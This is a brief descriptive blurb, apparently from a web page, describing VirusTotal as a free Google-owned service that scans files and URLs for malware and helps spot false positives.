VirusTotal, a subsidiary of Google, is a free online service that analyzes files and URLs enabling the identification of viruses, worms, trojans and other kinds of malicious content detected by antivirus engines and website scanners. At the same time, it may be used as a means to detect false positives, i.e. innocuous resources detected as malicious by one or more scanners.

VirusTotal’s mission is to help in improving the antivirus and security industry and make the internet a safer place through the development of free tools and services.

VirusTotal

Read More